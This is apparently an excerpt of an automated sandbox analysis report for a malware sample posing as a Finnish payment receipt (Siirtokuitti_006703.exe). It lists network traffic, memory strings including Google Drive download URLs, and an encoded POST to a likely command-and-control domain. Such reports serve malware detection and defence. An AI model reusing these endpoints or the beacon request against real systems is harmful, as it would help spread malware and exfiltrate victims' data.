      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 30 May 2023 09:13:50 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 30 May 2023 09:13:53 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 30 May 2023 09:13:56 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 30 May 2023 09:13:59 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19277603921.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19286262605.000000000762D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19282471449.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19287097585.000000000762C000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19287599564.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19277603921.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19286262605.000000000762D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19282471449.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19287097585.000000000762C000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19287599564.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Siirtokuitti_006703.exe, 00000001.00000000.18764879209.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Siirtokuitti_006703.exe, 00000003.00000000.19131681652.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19276888205.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19287599564.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19281692480.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19286262605.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-7k-docs.googleusercontent.com/
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19287599564.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19281692480.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19286262605.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-7k-docs.googleusercontent.com/I
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19287599564.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19281692480.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19286262605.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19276888205.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-7k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/k5vv2eer
      Source: Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19276888205.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19276888205.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19276888205.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19276888205.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19276888205.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownHTTP traffic detected: POST /tchg/ HTTP/1.1Host: www.minskadue.xyzConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.minskadue.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.minskadue.xyz/tchg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4f 30 71 45 4d 3d 4f 4c 48 71 66 47 78 6c 45 7a 4a 70 4c 5f 71 71 44 36 4a 50 34 79 49 61 38 7a 59 50 64 59 78 46 54 70 57 48 38 70 71 47 74 4d 4c 6c 4c 76 57 38 6b 6a 28 51 49 5a 33 76 78 36 38 33 34 6c 56 74 37 36 4f 59 6d 6d 76 56 30 61 44 56 33 45 57 48 45 70 73 4a 34 51 7e 36 4b 36 72 32 42 59 63 6e 55 63 57 72 72 6e 31 33 54 52 5a 55 56 57 38 65 74 47 53 53 66 31 55 32 4d 32 56 46 36 38 42 4f 64 52 77 41 67 63 7a 30 4a 79 4f 30 7e 75 6b 33 6e 61 6a 68 74 4c 64 63 61 37 33 4c 6b 59 62 49 57 69 38 73 66 4c 72 73 53 7a 56 75 78 53 6c 76 62 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: O0qEM=OLHqfGxlEzJpL_qqD6JP4yIa8zYPdYxFTpWH8pqGtMLlLvW8kj(QIZ3vx6834lVt76OYmmvV0aDV3EWHEpsJ4Q~6K6r2BYcnUcWrrn13TRZUVW8etGSSf1U2M2VF68BOdRwAgcz0JyO0~uk3najhtLdca73LkYbIWi8sfLrsSzVuxSlvbw).
      Source: unknownDNS traffic detected: queries for: drive.google.com
